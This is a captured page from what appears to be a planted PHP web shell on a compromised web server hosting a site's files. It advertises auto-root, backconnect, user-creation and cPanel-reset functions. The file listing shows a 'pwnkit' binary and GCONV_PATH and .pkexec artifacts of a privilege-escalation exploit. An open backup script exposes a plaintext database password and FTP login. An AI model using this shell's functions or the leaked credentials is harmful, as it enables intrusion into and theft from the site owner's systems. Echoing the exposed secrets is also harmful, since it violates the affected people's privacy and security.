Linux epsilon.cneris.com 5.15.0-134-generic #145-Ubuntu SMP Wed Feb 12 20:08:39 UTC 2025 x86_64
Apache
: 194.164.160.39 | : 18.218.67.48
Cant Read [ /etc/named.conf ]
7.4.33
essino.com
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
vhosts /
essino.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.composer
[ DIR ]
drwxr-xr-x
.pkexec
[ DIR ]
drwxr-xr-x
.revisium_antivirus_cache
[ DIR ]
drwxr-xr-x
.wp-cli
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
error_docs
[ DIR ]
drwxr-xr-x
httpdocs
[ DIR ]
drwxr-xr-x
logs
[ DIR ]
drwx------
wordpress-backups
[ DIR ]
drwx------
.mad-root
0
B
-rw-r--r--
.php-ini
45
B
-rw-------
.php-version
3
B
-rw-------
adminer.php
465.43
KB
-rw-r--r--
backup.sh
871
B
-rw-r--r--
essino.sql
38.71
MB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : backup.sh
#!/bin/bash #typically the first line of the bash scripts MYSQLUSER=essino2023 MYSQLBBDD=essino2023 MYSQLPASS=xD0@9dv8 DOMINIO=essino.com ROOTDIR=/var/www/vhosts/$DOMINIO BACKUPTIME=`date +%Y%m%d` #get the current date FILENAME=$DOMINIO-$BACKUPTIME.tar.gz mysqldump -h localhost -u $MYSQLBBDD $MYSQLUSER -p$MYSQLPASS --no-tablespaces > $ROOTDIR/httpdocs/$MYSQLBBDD$BACKUPTIME.sql DESTINATION=/var/www/vhosts/$DOMINIO/$FILENAME #create a backup file using the current date in it's name SOURCEFOLDER=/var/www/vhosts/$DOMINIO/httpdocs #the folder that contains the files that we want to backup tar -cpzvf $DESTINATION $SOURCEFOLDER #create the backup:wq #sleep 1 #cd $ROOTDIR ##ftp -n -v omega.cneris.com <<EOF #user cn3r1s-ftp f112358z #bin #put $FILENAME #quit #EOF #sleep 2 #rm -r $directorio #sleep 1m #rm $DESTINATION rm $ROOTDIR/httpdocs/$MYSQLBBDD$BACKUPTIME.sql
Close